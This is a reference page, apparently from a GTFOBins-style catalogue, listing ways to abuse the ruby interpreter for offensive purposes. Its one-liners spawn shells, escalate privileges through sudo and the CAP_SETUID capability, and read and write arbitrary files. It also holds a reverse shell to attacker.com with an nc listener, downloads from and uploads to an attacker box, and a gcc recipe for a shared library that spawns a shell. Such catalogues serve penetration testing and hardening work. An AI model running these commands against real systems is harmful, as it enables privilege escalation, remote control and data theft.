.. / ruby

Fork Star

• Shell
• Reverse shell
• File write
• File read
• Upload
• Download
• Library load

Shell

This executable can spawn an interactive system shell.

• Unprivileged

  This function can be performed by any unprivileged user.

  ruby -e 'exec "/bin/sh"'

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  ruby -e 'exec "/bin/sh"'

  Capabilities

  This function is performed bypassing the usual kernel permission checks if the executable has certain capabilities set.

  The following capabilities are needed: CAP_SETUID.

  ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'

Reverse shell

This executable can send back a reverse system shell to a listening attacker.

• Unprivileged

  This function can be performed by any unprivileged user.

  ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attacker.com",12345);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attacker.com",12345);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

  TTY

  The spawned shell is just a dummy REPL that can only run simple terminal commands.

  Listener

  A TCP server can be used on the attacker box to receive the shell.

  nc -l -p 12345

File write

This executable can write data to local files.

• Unprivileged

  This function can be performed by any unprivileged user.

  ruby -e 'File.open("/path/to/output-file", "w+") { |f| f.write("DATA") }'

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  ruby -e 'File.open("/path/to/output-file", "w+") { |f| f.write("DATA") }'

File read

This executable can read data from local files.

• Unprivileged

  This function can be performed by any unprivileged user.

  ruby -e 'puts File.read("/path/to/input-file")'

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  ruby -e 'puts File.read("/path/to/input-file")'

Upload

This executable can upload local data.

• Version requirements

  = 1.9.2

  Unprivileged

  This function can be performed by any unprivileged user.

  ruby -run -e httpd . -p 80

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  ruby -run -e httpd . -p 80

  Receiver

  An HTTP client can be used on the attacker box to receive the data.

  curl victim.com -o /path/to/output-file

Download

This executable can download remote data.

• Unprivileged

  This function can be performed by any unprivileged user.

  ruby -e 'require "open-uri"; download = URI.open("http://attacker.com/path/to/input-file"); IO.copy_stream(download, "/path/to/output-file")'

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  ruby -e 'require "open-uri"; download = URI.open("http://attacker.com/path/to/input-file"); IO.copy_stream(download, "/path/to/output-file")'

  Sender

  An HTTP server can be used on the attacker box to send the data.

  python -m http.server 80

Library load

This executable can load shared libraries that may be used to run arbitrary code in the same execution context.

• Unprivileged

  This function can be performed by any unprivileged user.

  ruby -e 'require "fiddle"; Fiddle.dlopen("/path/to/lib.so")'

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  ruby -e 'require "fiddle"; Fiddle.dlopen("/path/to/lib.so")'

  Payload

  As an example, the following can be used to create a minimal shared library (lib.so) that spawns a shell upon loading:

  echo '__attribute__((constructor)) init() { execl("/bin/sh", "sh", 0); }' \
      | gcc -w -fPIC -shared -o lib.so -x c -
  

  Add the usual -p argument to the shell for SUID contexts. Consider calling setuid(0); beforehand if the executable has the CAP_SETUID capability assigned.

Source | History